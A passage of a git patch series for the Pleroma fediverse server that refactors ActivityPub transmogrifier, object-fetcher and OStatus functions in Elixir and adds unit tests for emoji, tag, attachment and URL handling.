- mapping |> Map.put(name, data["icon"]["url"])
+ Map.put(mapping, name, data["icon"]["url"])
end)
# we merge mastodon and pleroma emoji into a single mapping, to allow for both wire formats
emoji = Map.merge(object["emoji"] || %{}, emoji)
- object
- |> Map.put("emoji", emoji)
+ Map.put(object, "emoji", emoji)
end
def fix_emoji(%{"tag" => %{"type" => "Emoji"} = tag} = object) do
name = String.trim(tag["name"], ":")
emoji = %{name => tag["icon"]["url"]}
- object
- |> Map.put("emoji", emoji)
+ Map.put(object, "emoji", emoji)
end
def fix_emoji(object), do: object
@@ -303,17 +282,13 @@ def fix_tag(%{"tag" => tag} = object) when is_list(tag) do
|> Enum.filter(fn data -> data["type"] == "Hashtag" and data["name"] end)
|> Enum.map(fn data -> String.slice(data["name"], 1..-1) end)
- combined = tag ++ tags
-
- object
- |> Map.put("tag", combined)
+ Map.put(object, "tag", tag ++ tags)
end
def fix_tag(%{"tag" => %{"type" => "Hashtag", "name" => hashtag} = tag} = object) do
combined = [tag, String.slice(hashtag, 1..-1)]
- object
- |> Map.put("tag", combined)
+ Map.put(object, "tag", combined)
end
def fix_tag(%{"tag" => %{} = tag} = object), do: Map.put(object, "tag", [tag])
@@ -325,8 +300,7 @@ def fix_content_map(%{"contentMap" => content_map} = object) do
content_groups = Map.to_list(content_map)
{_, content} = Enum.at(content_groups, 0)
- object
- |> Map.put("content", content)
+ Map.put(object, "content", content)
end
def fix_content_map(object), do: object
@@ -335,16 +309,11 @@ def fix_type(object, options \\ [])
def fix_type(%{"inReplyTo" => reply_id, "name" => _} = object, options)
when is_binary(reply_id) do
- reply =
- with true <- Federator.allowed_incoming_reply_depth?(options[:depth]),
- {:ok, object} <- get_obj_helper(reply_id, options) do
- object
- end
-
- if reply && reply.data["type"] == "Question" do
+ with true <- Federator.allowed_incoming_reply_depth?(options[:depth]),
+ {:ok, %{data: %{"type" => "Question"} = _} = _} <- get_obj_helper(reply_id, options) do
Map.put(object, "type", "Answer")
else
- object
+ _ -> object
end
end
@@ -376,6 +345,17 @@ defp get_follow_activity(follow_object, followed) do
end
end
+ # Reduce the object list to find the reported user.
+ defp get_reported(objects) do
+ Enum.reduce_while(objects, nil, fn ap_id, _ ->
+ with %User{} = user <- User.get_cached_by_ap_id(ap_id) do
+ {:halt, user}
+ else
+ _ -> {:cont, nil}
+ end
+ end)
+ end
+
def handle_incoming(data, options \\ [])
# Flag objects are placed ahead of the ID check because Mastodon 2.8 and earlier send them
@@ -384,31 +364,19 @@ def handle_incoming(%{"type" => "Flag", "object" => objects, "actor" => actor} =
with context <- data["context"] || Utils.generate_context_id(),
content <- data["content"] || "",
%User{} = actor <- User.get_cached_by_ap_id(actor),
-
# Reduce the object list to find the reported user.
- %User{} = account <-
- Enum.reduce_while(objects, nil, fn ap_id, _ ->
- with %User{} = user <- User.get_cached_by_ap_id(ap_id) do
- {:halt, user}
- else
- _ -> {:cont, nil}
- end
- end),
-
+ %User{} = account <- get_reported(objects),
# Remove the reported user from the object list.
statuses <- Enum.filter(objects, fn ap_id -> ap_id != account.ap_id end) do
- params = %{
+ %{
actor: actor,
context: context,
account: account,
statuses: statuses,
content: content,
- additional: %{
- "cc" => [account.ap_id]
- }
+ additional: %{"cc" => [account.ap_id]}
}
-
- ActivityPub.flag(params)
+ |> ActivityPub.flag()
end
end
@@ -755,8 +723,13 @@ def handle_incoming(
def handle_incoming(_, _), do: :error
+ @spec get_obj_helper(String.t(), Keyword.t()) :: {:ok, Object.t()} | nil
def get_obj_helper(id, options \\ []) do
- if object = Object.normalize(id, true, options), do: {:ok, object}, else: nil
+ if object = Object.normalize(id, true, options) do
+ {:ok, object}
+ else
+ nil
+ end
end
def set_reply_to_uri(%{"inReplyTo" => in_reply_to} = object) when is_binary(in_reply_to) do
@@ -855,27 +828,24 @@ def prepare_outgoing(%{"type" => _type} = data) do
{:ok, data}
end
- def maybe_fix_object_url(data) do
- if is_binary(data["object"]) and not String.starts_with?(data["object"], "http") do
- case get_obj_helper(data["object"]) do
- {:ok, relative_object} ->
- if relative_object.data["external_url"] do
- _data =
- data
- |> Map.put("object", relative_object.data["external_url"])
- else
- data
- end
-
- e ->
- Logger.error("Couldn't fetch #{data["object"]} #{inspect(e)}")
- data
- end
+ def maybe_fix_object_url(%{"object" => object} = data) when is_binary(object) do
+ with false <- String.starts_with?(object, "http"),
+ {:fetch, {:ok, relative_object}} <- {:fetch, get_obj_helper(object)},
+ %{data: %{"external_url" => external_url}} when not is_nil(external_url) <-
+ relative_object do
+ Map.put(data, "object", external_url)
else
- data
+ {:fetch, e} ->
+ Logger.error("Couldn't fetch #{object} #{inspect(e)}")
+ data
+
+ _ ->
+ data
end
end
+ def maybe_fix_object_url(data), do: data
+
def add_hashtags(object) do
tags =
(object["tag"] || [])
@@ -893,8 +863,7 @@ def add_hashtags(object) do
tag
end)
- object
- |> Map.put("tag", tags)
+ Map.put(object, "tag", tags)
end
def add_mention_tags(object) do
@@ -907,15 +876,13 @@ def add_mention_tags(object) do
tags = object["tag"] || []
- object
- |> Map.put("tag", tags ++ mentions)
+ Map.put(object, "tag", tags ++ mentions)
end
def add_emoji_tags(%User{info: %{"emoji" => _emoji} = user_info} = object) do
user_info = add_emoji_tags(user_info)
- object
- |> Map.put(:info, user_info)
+ Map.put(object, :info, user_info)
end
# TODO: we should probably send mtime instead of unix epoch time for updated
@@ -923,8 +890,7 @@ def add_emoji_tags(%{"emoji" => emoji} = object) do
tags = object["tag"] || []
out =
- emoji
- |> Enum.map(fn {name, url} ->
+ Enum.map(emoji, fn {name, url} ->
%{
"icon" => %{"url" => url, "type" => "Image"},
"name" => ":" <> name <> ":",
@@ -934,13 +900,10 @@ def add_emoji_tags(%{"emoji" => emoji} = object) do
}
end)
- object
- |> Map.put("tag", tags ++ out)
+ Map.put(object, "tag", tags ++ out)
end
- def add_emoji_tags(object) do
- object
- end
+ def add_emoji_tags(object), do: object
def set_conversation(object) do
Map.put(object, "conversation", object["context"])
@@ -959,9 +922,7 @@ def set_type(object), do: object
def add_attributed_to(object) do
attributed_to = object["attributedTo"] || object["actor"]
-
- object
- |> Map.put("attributedTo", attributed_to)
+ Map.put(object, "attributedTo", attributed_to)
end
def prepare_attachments(object) do
@@ -972,8 +933,7 @@ def prepare_attachments(object) do
%{"url" => href, "mediaType" => media_type, "name" => data["name"], "type" => "Document"}
end)
- object
- |> Map.put("attachment", attachments)
+ Map.put(object, "attachment", attachments)
end
defp strip_internal_fields(object) do
@@ -990,12 +950,9 @@ defp strip_internal_fields(object) do
end
defp strip_internal_tags(%{"tag" => tags} = object) do
- tags =
- tags
- |> Enum.filter(fn x -> is_map(x) end)
+ tags = Enum.filter(tags, fn x -> is_map(x) end)
- object
- |> Map.put("tag", tags)
+ Map.put(object, "tag", tags)
end
defp strip_internal_tags(object), do: object
@@ -1074,16 +1031,11 @@ def maybe_retire_websub(ap_id) do
end
end
- def maybe_fix_user_url(data) do
- if is_map(data["url"]) do
- Map.put(data, "url", data["url"]["href"])
- else
- data
- end
+ def maybe_fix_user_url(%{"url" => url} = data) when is_map(url) do
+ Map.put(data, "url", url["href"])
end
- def maybe_fix_user_object(data) do
- data
- |> maybe_fix_user_url
- end
+ def maybe_fix_user_url(data), do: data
+
+ def maybe_fix_user_object(data), do: maybe_fix_user_url(data)
end
diff --git a/test/web/activity_pub/transmogrifier_test.exs b/test/web/activity_pub/transmogrifier_test.exs
index 0661d5d7c..63c869d35 100644
--- a/test/web/activity_pub/transmogrifier_test.exs
+++ b/test/web/activity_pub/transmogrifier_test.exs
@@ -1451,4 +1451,166 @@ test "removes recipient's follower collection from cc", %{user: user} do
refute recipient.follower_address in fixed_object["to"]
end
end
+
+ describe "fix_summary/1" do
+ test "returns fixed object" do
+ assert Transmogrifier.fix_summary(%{"summary" => nil}) == %{"summary" => ""}
+ assert Transmogrifier.fix_summary(%{"summary" => "ok"}) == %{"summary" => "ok"}
+ assert Transmogrifier.fix_summary(%{}) == %{"summary" => ""}
+ end
+ end
+
+ describe "fix_in_reply_to/2" do
+ clear_config([:instance, :federation_incoming_replies_max_depth])
+
+ setup do
+ data = Poison.decode!(File.read!("test/fixtures/mastodon-post-activity.json"))
+ [data: data]
+ end
+
+ test "returns not modified object when hasn't containts inReplyTo field", %{data: data} do
+ assert Transmogrifier.fix_in_reply_to(data) == data
+ end
+
+ test "returns object with inReplyToAtomUri when denied incoming reply", %{data: data} do
+ Pleroma.Config.put([:instance, :federation_incoming_replies_max_depth], 0)
+
+ object_with_reply =
+ Map.put(data["object"], "inReplyTo", "https://shitposter.club/notice/2827873")
+
+ modified_object = Transmogrifier.fix_in_reply_to(object_with_reply)
+ assert modified_object["inReplyTo"] == "https://shitposter.club/notice/2827873"
+ assert modified_object["inReplyToAtomUri"] == "https://shitposter.club/notice/2827873"
+
+ object_with_reply =
+ Map.put(data["object"], "inReplyTo", %{"id" => "https://shitposter.club/notice/2827873"})
+
+ modified_object = Transmogrifier.fix_in_reply_to(object_with_reply)
+ assert modified_object["inReplyTo"] == %{"id" => "https://shitposter.club/notice/2827873"}
+ assert modified_object["inReplyToAtomUri"] == "https://shitposter.club/notice/2827873"
+
+ object_with_reply =
+ Map.put(data["object"], "inReplyTo", ["https://shitposter.club/notice/2827873"])
+
+ modified_object = Transmogrifier.fix_in_reply_to(object_with_reply)
+ assert modified_object["inReplyTo"] == ["https://shitposter.club/notice/2827873"]
+ assert modified_object["inReplyToAtomUri"] == "https://shitposter.club/notice/2827873"
+
+ object_with_reply = Map.put(data["object"], "inReplyTo", [])
+ modified_object = Transmogrifier.fix_in_reply_to(object_with_reply)
+ assert modified_object["inReplyTo"] == []
+ assert modified_object["inReplyToAtomUri"] == ""
+ end
+
+ test "returns modified object when allowed incoming reply", %{data: data} do
+ object_with_reply =
+ Map.put(
+ data["object"],
+ "inReplyTo",
+ "https://shitposter.club/notice/2827873"
+ )
+
+ Pleroma.Config.put([:instance, :federation_incoming_replies_max_depth], 5)
+ modified_object = Transmogrifier.fix_in_reply_to(object_with_reply)
+
+ assert modified_object["inReplyTo"] ==
+ "tag:shitposter.club,2017-05-05:noticeId=2827873:objectType=comment"
+
+ assert modified_object["inReplyToAtomUri"] == "https://shitposter.club/notice/2827873"
+
+ assert modified_object["conversation"] ==
+ "tag:shitposter.club,2017-05-05:objectType=thread:nonce=3c16e9c2681f6d26"
+
+ assert modified_object["context"] ==
+ "tag:shitposter.club,2017-05-05:objectType=thread:nonce=3c16e9c2681f6d26"
+ end
+ end
+
+ describe "fix_url/1" do
+ test "fixes data for object when url is map" do
+ object = %{
+ "url" => %{
+ "type" => "Link",
+ "mimeType" => "video/mp4",
+ "href" => "https://peede8d-46fb-ad81-2d4c2d1630e3-480.mp4"
+ }
+ }
+
+ assert Transmogrifier.fix_url(object) == %{
+ "url" => "https://peede8d-46fb-ad81-2d4c2d1630e3-480.mp4"
+ }
+ end
+
+ test "fixes data for video object" do
+ object = %{
+ "type" => "Video",
+ "url" => [
+ %{
+ "type" => "Link",
+ "mimeType" => "video/mp4",
+ "href" => "https://peede8d-46fb-ad81-2d4c2d1630e3-480.mp4"
+ },
+ %{
+ "type" => "Link",
+ "mimeType" => "video/mp4",
+ "href" => "https://peertube46fb-ad81-2d4c2d1630e3-240.mp4"
+ },
+ %{
+ "type" => "Link",
+ "mimeType" => "text/html",
+ "href" => "https://peertube.-2d4c2d1630e3"
+ },
+ %{
+ "type" => "Link",
+ "mimeType" => "text/html",
+ "href" => "https://peertube.-2d4c2d16377-42"
+ }
+ ]
+ }
+
+ assert Transmogrifier.fix_url(object) == %{
+ "attachment" => [
+ %{
+ "href" => "https://peede8d-46fb-ad81-2d4c2d1630e3-480.mp4",
+ "mimeType" => "video/mp4",
+ "type" => "Link"
+ }
+ ],
+ "type" => "Video",
+ "url" => "https://peertube.-2d4c2d1630e3"
+ }
+ end
+
+ test "fixes url for not Video object" do
+ object = %{
+ "type" => "Text",
+ "url" => [
+ %{
+ "type" => "Link",
+ "mimeType" => "text/html",
+ "href" => "https://peertube.-2d4c2d1630e3"
+ },
+ %{
+ "type" => "Link",
+ "mimeType" => "text/html",
+ "href" => "https://peertube.-2d4c2d16377-42"
+ }
+ ]
+ }
+
+ assert Transmogrifier.fix_url(object) == %{
+ "type" => "Text",
+ "url" => "https://peertube.-2d4c2d1630e3"
+ }
+
+ assert Transmogrifier.fix_url(%{"type" => "Text", "url" => []}) == %{
+ "type" => "Text",
+ "url" => ""
+ }
+ end
+
+ test "retunrs not modified object" do
+ assert Transmogrifier.fix_url(%{"type" => "Text"}) == %{"type" => "Text"}
+ end
+ end
end
From fcf604fa43031be747b33c05866a192d9651322c Mon Sep 17 00:00:00 2001
From: Maksim Pechnikov
Date: Wed, 11 Sep 2019 07:23:33 +0300
Subject: [PATCH 044/272] added tests
---
lib/pleroma/object/fetcher.ex | 77 ++++++++++---------
.../web/activity_pub/transmogrifier.ex | 12 +--
test/web/activity_pub/transmogrifier_test.exs | 74 ++++++++++++++++++
3 files changed, 121 insertions(+), 42 deletions(-)
diff --git a/lib/pleroma/object/fetcher.ex b/lib/pleroma/object/fetcher.ex
index c1795ae0f..2217d1eb3 100644
--- a/lib/pleroma/object/fetcher.ex
+++ b/lib/pleroma/object/fetcher.ex
@@ -13,6 +13,7 @@ defmodule Pleroma.Object.Fetcher do
require Logger
+ @spec reinject_object(map()) :: {:ok, Object.t()} | {:error, any()}
defp reinject_object(data) do
Logger.debug("Reinjecting object #{data["id"]}")
@@ -29,50 +30,54 @@ defp reinject_object(data) do
# TODO:
# This will create a Create activity, which we need internally at the moment.
def fetch_object_from_id(id, options \\ []) do
- if object = Object.get_cached_by_ap_id(id) do
+ with {:fetch_object, nil} <- {:fetch_object, Object.get_cached_by_ap_id(id)},
+ {:fetch, {:ok, data}} <- {:fetch, fetch_and_contain_remote_object_from_id(id)},
+ {:normalize, nil} <- {:normalize, Object.normalize(data, false)},
+ params <- prepare_activity_params(data),
+ {:containment, :ok} <- {:containment, Containment.contain_origin(id, params)},
+ {:ok, activity} <- Transmogrifier.handle_incoming(params, options),
+ {:object, _data, %Object{} = object} <-
+ {:object, data, Object.normalize(activity, false)} do
{:ok, object}
else
- Logger.info("Fetching #{id} via AP")
+ {:containment, _} ->
+ {:error, "Object containment failed."}
- with {:fetch, {:ok, data}} <- {:fetch, fetch_and_contain_remote_object_from_id(id)},
- {:normalize, nil} <- {:normalize, Object.normalize(data, false)},
- params <- %{
- "type" => "Create",
- "to" => data["to"],
- "cc" => data["cc"],
- # Should we seriously keep this attributedTo thing?
- "actor" => data["actor"] || data["attributedTo"],
- "object" => data
- },
- {:containment, :ok} <- {:containment, Containment.contain_origin(id, params)},
- {:ok, activity} <- Transmogrifier.handle_incoming(params, options),
- {:object, _data, %Object{} = object} <-
- {:object, data, Object.normalize(activity, false)} do
+ {:error, {:reject, nil}} ->
+ {:reject, nil}
+
+ {:object, data, nil} ->
+ reinject_object(data)
+
+ {:normalize, object = %Object{}} ->
{:ok, object}
- else
- {:containment, _} ->
- {:error, "Object containment failed."}
- {:error, {:reject, nil}} ->
- {:reject, nil}
+ {:fetch_object, %Object{} = object} ->
+ {:ok, object}
- {:object, data, nil} ->
- reinject_object(data)
+ _e ->
+ # Only fallback when receiving a fetch/normalization error with ActivityPub
+ Logger.info("Couldn't get object via AP, trying out OStatus fetching...")
- {:normalize, object = %Object{}} ->
- {:ok, object}
-
- _e ->
- # Only fallback when receiving a fetch/normalization error with ActivityPub
- Logger.info("Couldn't get object via AP, trying out OStatus fetching...")
-
- # FIXME: OStatus Object Containment?
- case OStatus.fetch_activity_from_url(id) do
- {:ok, [activity | _]} -> {:ok, Object.normalize(activity, false)}
- e -> e
- end
- end
+ # FIXME: OStatus Object Containment?
+ case OStatus.fetch_activity_from_url(id) do
+ {:ok, [activity | _]} -> {:ok, Object.normalize(activity, false)}
+ e -> e
+ end
end
+
+ # end
+ end
+
+ defp prepare_activity_params(data) do
+ %{
+ "type" => "Create",
+ "to" => data["to"],
+ "cc" => data["cc"],
+ # Should we seriously keep this attributedTo thing?
+ "actor" => data["actor"] || data["attributedTo"],
+ "object" => data
+ }
end
def fetch_object_from_id!(id, options \\ []) do
diff --git a/lib/pleroma/web/activity_pub/transmogrifier.ex b/lib/pleroma/web/activity_pub/transmogrifier.ex
index 93b3a1f97..18a3c3f39 100644
--- a/lib/pleroma/web/activity_pub/transmogrifier.ex
+++ b/lib/pleroma/web/activity_pub/transmogrifier.ex
@@ -204,7 +204,6 @@ def fix_attachments(%{"attachment" => attachment} = object) when is_list(attachm
Enum.map(attachment, fn data ->
media_type = data["mediaType"] || data["mimeType"]
href = data["url"] || data["href"]
-
url = [%{"type" => "Link", "mediaType" => media_type, "href" => href}]
data
@@ -216,7 +215,9 @@ def fix_attachments(%{"attachment" => attachment} = object) when is_list(attachm
end
def fix_attachments(%{"attachment" => attachment} = object) when is_map(attachment) do
- fix_attachments(Map.put(object, "attachment", [attachment]))
+ object
+ |> Map.put("attachment", [attachment])
+ |> fix_attachments()
end
def fix_attachments(object), do: object
@@ -725,10 +726,9 @@ def handle_incoming(_, _), do: :error
@spec get_obj_helper(String.t(), Keyword.t()) :: {:ok, Object.t()} | nil
def get_obj_helper(id, options \\ []) do
- if object = Object.normalize(id, true, options) do
- {:ok, object}
- else
- nil
+ case Object.normalize(id, true, options) do
+ %Object{} = object -> {:ok, object}
+ _ -> nil
end
end
diff --git a/test/web/activity_pub/transmogrifier_test.exs b/test/web/activity_pub/transmogrifier_test.exs
index 63c869d35..ab6e76056 100644
--- a/test/web/activity_pub/transmogrifier_test.exs
+++ b/test/web/activity_pub/transmogrifier_test.exs
@@ -1613,4 +1613,78 @@ test "retunrs not modified object" do
assert Transmogrifier.fix_url(%{"type" => "Text"}) == %{"type" => "Text"}
end
end
+
+ describe "get_obj_helper/2" do
+ test "returns nil when cannot normalize object" do
+ refute Transmogrifier.get_obj_helper("test-obj-id")
+ end
+
+ test "returns {:ok, %Object{}} for success case" do
+ assert {:ok, %Object{}} =
+ Transmogrifier.get_obj_helper("https://shitposter.club/notice/2827873")
+ end
+ end
+
+ describe "fix_attachments/1" do
+ test "returns not modified object" do
+ data = Poison.decode!(File.read!("test/fixtures/mastodon-post-activity.json"))
+ assert Transmogrifier.fix_attachments(data) == data
+ end
+
+ test "returns modified object when attachment is map" do
+ assert Transmogrifier.fix_attachments(%{
+ "attachment" => %{
+ "mediaType" => "video/mp4",
+ "url" => "https://peertube.moe/stat-480.mp4"
+ }
+ }) == %{
+ "attachment" => [
+ %{
+ "mediaType" => "video/mp4",
+ "url" => [
+ %{
+ "href" => "https://peertube.moe/stat-480.mp4",
+ "mediaType" => "video/mp4",
+ "type" => "Link"
+ }
+ ]
+ }
+ ]
+ }
+ end
+
+ test "returns modified object when attachment is list" do
+ assert Transmogrifier.fix_attachments(%{
+ "attachment" => [
+ %{"mediaType" => "video/mp4", "url" => "https://pe.er/stat-480.mp4"},
+ %{"mimeType" => "video/mp4", "href" => "https://pe.er/stat-480.mp4"}
+ ]
+ }) == %{
+ "attachment" => [
+ %{
+ "mediaType" => "video/mp4",
+ "url" => [
+ %{
+ "href" => "https://pe.er/stat-480.mp4",
+ "mediaType" => "video/mp4",
+ "type" => "Link"
+ }
+ ]
+ },
+ %{
+ "href" => "https://pe.er/stat-480.mp4",
+ "mediaType" => "video/mp4",
+ "mimeType" => "video/mp4",
+ "url" => [
+ %{
+ "href" => "https://pe.er/stat-480.mp4",
+ "mediaType" => "video/mp4",
+ "type" => "Link"
+ }
+ ]
+ }
+ ]
+ }
+ end
+ end
end
From 007e0c1ce158bdfc11738a194944534837ae0258 Mon Sep 17 00:00:00 2001
From: Maksim Pechnikov
Date: Wed, 11 Sep 2019 23:19:06 +0300
Subject: [PATCH 045/272] added tests
---
.../web/activity_pub/transmogrifier.ex | 35 ++++++++++---------
.../web/activity_pub/views/user_view.ex | 7 ++--
test/web/activity_pub/transmogrifier_test.exs | 31 ++++++++++++++++
.../web/activity_pub/views/user_view_test.exs | 16 +++++++++
4 files changed, 68 insertions(+), 21 deletions(-)
diff --git a/lib/pleroma/web/activity_pub/transmogrifier.ex b/lib/pleroma/web/activity_pub/transmogrifier.ex
index 18a3c3f39..9f699de9e 100644
--- a/lib/pleroma/web/activity_pub/transmogrifier.ex
+++ b/lib/pleroma/web/activity_pub/transmogrifier.ex
@@ -870,41 +870,44 @@ def add_mention_tags(object) do
mentions =
object
|> Utils.get_notified_from_object()
- |> Enum.map(fn user ->
- %{"type" => "Mention", "href" => user.ap_id, "name" => "@#{user.nickname}"}
- end)
+ |> Enum.map(&build_mention_tag/1)
tags = object["tag"] || []
Map.put(object, "tag", tags ++ mentions)
end
- def add_emoji_tags(%User{info: %{"emoji" => _emoji} = user_info} = object) do
- user_info = add_emoji_tags(user_info)
+ defp build_mention_tag(%{ap_id: ap_id, nickname: nickname} = _) do
+ %{"type" => "Mention", "href" => ap_id, "name" => "@#{nickname}"}
+ end
- Map.put(object, :info, user_info)
+ def take_emoji_tags(%User{info: %{emoji: emoji} = _user_info} = _user) do
+ emoji
+ |> Enum.flat_map(&Map.to_list/1)
+ |> Enum.map(&build_emoji_tag/1)
end
# TODO: we should probably send mtime instead of unix epoch time for updated
def add_emoji_tags(%{"emoji" => emoji} = object) do
tags = object["tag"] || []
- out =
- Enum.map(emoji, fn {name, url} ->
- %{
- "icon" => %{"url" => url, "type" => "Image"},
- "name" => ":" <> name <> ":",
- "type" => "Emoji",
- "updated" => "1970-01-01T00:00:00Z",
- "id" => url
- }
- end)
+ out = Enum.map(emoji, &build_emoji_tag/1)
Map.put(object, "tag", tags ++ out)
end
def add_emoji_tags(object), do: object
+ defp build_emoji_tag({name, url}) do
+ %{
+ "icon" => %{"url" => url, "type" => "Image"},
+ "name" => ":" <> name <> ":",
+ "type" => "Emoji",
+ "updated" => "1970-01-01T00:00:00Z",
+ "id" => url
+ }
+ end
+
def set_conversation(object) do
Map.put(object, "conversation", object["context"])
end
diff --git a/lib/pleroma/web/activity_pub/views/user_view.ex b/lib/pleroma/web/activity_pub/views/user_view.ex
index 7be734b26..8abfa1fcd 100644
--- a/lib/pleroma/web/activity_pub/views/user_view.ex
+++ b/lib/pleroma/web/activity_pub/views/user_view.ex
@@ -75,10 +75,7 @@ def render("user.json", %{user: user}) do
endpoints = render("endpoints.json", %{user: user})
- user_tags =
- user
- |> Transmogrifier.add_emoji_tags()
- |> Map.get("tag", [])
+ emoji_tags = Transmogrifier.take_emoji_tags(user)
fields =
user.info
@@ -110,7 +107,7 @@ def render("user.json", %{user: user}) do
},
"endpoints" => endpoints,
"attachment" => fields,
- "tag" => (user.info.source_data["tag"] || []) ++ user_tags
+ "tag" => (user.info.source_data["tag"] || []) ++ emoji_tags
}
|> Map.merge(maybe_make_image(&User.avatar_url/2, "icon", user))
|> Map.merge(maybe_make_image(&User.banner_url/2, "image", user))
diff --git a/test/web/activity_pub/transmogrifier_test.exs b/test/web/activity_pub/transmogrifier_test.exs
index ab6e76056..87ef843c6 100644
--- a/test/web/activity_pub/transmogrifier_test.exs
+++ b/test/web/activity_pub/transmogrifier_test.exs
@@ -1687,4 +1687,35 @@ test "returns modified object when attachment is list" do
}
end
end
+
+ describe "fix_emoji/1" do
+ test "returns not modified object when object not contains tags" do
+ data = Poison.decode!(File.read!("test/fixtures/mastodon-post-activity.json"))
+ assert Transmogrifier.fix_emoji(data) == data
+ end
+
+ test "returns object with emoji when object contains list tags" do
+ assert Transmogrifier.fix_emoji(%{
+ "tag" => [
+ %{"type" => "Emoji", "name" => ":bib:", "icon" => %{"url" => "/test"}},
+ %{"type" => "Hashtag"}
+ ]
+ }) == %{
+ "emoji" => %{"bib" => "/test"},
+ "tag" => [
+ %{"icon" => %{"url" => "/test"}, "name" => ":bib:", "type" => "Emoji"},
+ %{"type" => "Hashtag"}
+ ]
+ }
+ end
+
+ test "returns object with emoji when object contains map tag" do
+ assert Transmogrifier.fix_emoji(%{
+ "tag" => %{"type" => "Emoji", "name" => ":bib:", "icon" => %{"url" => "/test"}}
+ }) == %{
+ "emoji" => %{"bib" => "/test"},
+ "tag" => %{"icon" => %{"url" => "/test"}, "name" => ":bib:", "type" => "Emoji"}
+ }
+ end
+ end
end
diff --git a/test/web/activity_pub/views/user_view_test.exs b/test/web/activity_pub/views/user_view_test.exs
index fb7fd9e79..4390f9272 100644
--- a/test/web/activity_pub/views/user_view_test.exs
+++ b/test/web/activity_pub/views/user_view_test.exs
@@ -37,6 +37,22 @@ test "Renders profile fields" do
} = UserView.render("user.json", %{user: user})
end
+ test "Renders with emoji tags" do
+ user = insert(:user, %{info: %{emoji: [%{"bib" => "/test"}]}})
+
+ assert %{
+ "tag" => [
+ %{
+ "icon" => %{"type" => "Image", "url" => "/test"},
+ "id" => "/test",
+ "name" => ":bib:",
+ "type" => "Emoji",
+ "updated" => "1970-01-01T00:00:00Z"
+ }
+ ]
+ } = UserView.render("user.json", %{user: user})
+ end
+
test "Does not add an avatar image if the user hasn't set one" do
user = insert(:user)
{:ok, user} = User.ensure_keys_present(user)
From 4f548cb2b7b4a16a956a4f4a0ff64d279777925e Mon Sep 17 00:00:00 2001
From: Maksim Pechnikov
Date: Thu, 12 Sep 2019 09:59:34 +0300
Subject: [PATCH 046/272] added test for Ostatus
---
.../web/activity_pub/transmogrifier.ex | 10 +-
lib/pleroma/web/ostatus/ostatus.ex | 99 ++++++++-----------
lib/pleroma/web/ostatus/ostatus_controller.ex | 12 +--
test/web/ostatus/ostatus_test.exs | 14 +++
4 files changed, 68 insertions(+), 67 deletions(-)
diff --git a/lib/pleroma/web/activity_pub/transmogrifier.ex b/lib/pleroma/web/activity_pub/transmogrifier.ex
index 468961bd0..acd61bda3 100644
--- a/lib/pleroma/web/activity_pub/transmogrifier.ex
+++ b/lib/pleroma/web/activity_pub/transmogrifier.ex
@@ -1049,8 +1049,8 @@ def upgrade_user_from_ap_id(ap_id) do
with %User{local: false} = user <- User.get_cached_by_ap_id(ap_id),
{:ok, data} <- ActivityPub.fetch_and_prepare_user_from_ap_id(ap_id),
already_ap <- User.ap_enabled?(user),
- {:ok, user} <- user |> User.upgrade_changeset(data) |> User.update_and_set_cache() do
- unless already_ap do
+ {:ok, user} <- upgrade_user(user, data) do
+ if not already_ap do
PleromaJobQueue.enqueue(:transmogrifier, __MODULE__, [:user_upgrade, user])
end
@@ -1061,6 +1061,12 @@ def upgrade_user_from_ap_id(ap_id) do
end
end
+ defp upgrade_user(user, data) do
+ user
+ |> User.upgrade_changeset(data)
+ |> User.update_and_set_cache()
+ end
+
def maybe_retire_websub(ap_id) do
# some sanity checks
if is_binary(ap_id) && String.length(ap_id) > 8 do
diff --git a/lib/pleroma/web/ostatus/ostatus.ex b/lib/pleroma/web/ostatus/ostatus.ex
index 331cbc0b7..5de1ceef3 100644
--- a/lib/pleroma/web/ostatus/ostatus.ex
+++ b/lib/pleroma/web/ostatus/ostatus.ex
@@ -3,14 +3,12 @@
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.OStatus do
- import Ecto.Query
import Pleroma.Web.XML
require Logger
alias Pleroma.Activity
alias Pleroma.HTTP
alias Pleroma.Object
- alias Pleroma.Repo
alias Pleroma.User
alias Pleroma.Web
alias Pleroma.Web.ActivityPub.ActivityPub
@@ -38,21 +36,13 @@ def is_representable?(%Activity{} = activity) do
end
end
- def feed_path(user) do
- "#{user.ap_id}/feed.atom"
- end
+ def feed_path(user), do: "#{user.ap_id}/feed.atom"
- def pubsub_path(user) do
- "#{Web.base_url()}/push/hub/#{user.nickname}"
- end
+ def pubsub_path(user), do: "#{Web.base_url()}/push/hub/#{user.nickname}"
- def salmon_path(user) do
- "#{user.ap_id}/salmon"
- end
+ def salmon_path(user), do: "#{user.ap_id}/salmon"
- def remote_follow_path do
- "#{Web.base_url()}/ostatus_subscribe?acct={uri}"
- end
+ def remote_follow_path, do: "#{Web.base_url()}/ostatus_subscribe?acct={uri}"
def handle_incoming(xml_string, options \\ []) do
with doc when doc != :error <- parse_document(xml_string) do
@@ -217,10 +207,9 @@ def get_content(entry) do
Get the cw that mastodon uses.
"""
def get_cw(entry) do
- with cw when not is_nil(cw) <- string_from_xpath("/*/summary", entry) do
- cw
- else
- _e -> nil
+ case string_from_xpath("/*/summary", entry) do
+ cw when not is_nil(cw) -> cw
+ _ -> nil
end
end
@@ -232,19 +221,17 @@ def get_tags(entry) do
end
def maybe_update(doc, user) do
- if "true" == string_from_xpath("//author[1]/ap_enabled", doc) do
- Transmogrifier.upgrade_user_from_ap_id(user.ap_id)
- else
- maybe_update_ostatus(doc, user)
+ case string_from_xpath("//author[1]/ap_enabled", doc) do
+ "true" ->
+ Transmogrifier.upgrade_user_from_ap_id(user.ap_id)
+
+ _ ->
+ maybe_update_ostatus(doc, user)
end
end
def maybe_update_ostatus(doc, user) do
- old_data = %{
- avatar: user.avatar,
- bio: user.bio,
- name: user.name
- }
+ old_data = Map.take(user, [:bio, :avatar, :name])
with false <- user.local,
avatar <- make_avatar_object(doc),
@@ -279,38 +266,37 @@ def find_make_or_update_actor(doc) do
end
end
+ @spec find_or_make_user(String.t()) :: {:ok, User.t()}
def find_or_make_user(uri) do
- query = from(user in User, where: user.ap_id == ^uri)
-
- user = Repo.one(query)
-
- if is_nil(user) do
- make_user(uri)
- else
- {:ok, user}
+ case User.get_by_ap_id(uri) do
+ %User{} = user -> {:ok, user}
+ _ -> make_user(uri)
end
end
+ @spec make_user(String.t(), boolean()) :: {:ok, User.t()} | {:error, any()}
def make_user(uri, update \\ false) do
with {:ok, info} <- gather_user_info(uri) do
- data = %{
- name: info["name"],
- nickname: info["nickname"] <> "@" <> info["host"],
- ap_id: info["uri"],
- info: info,
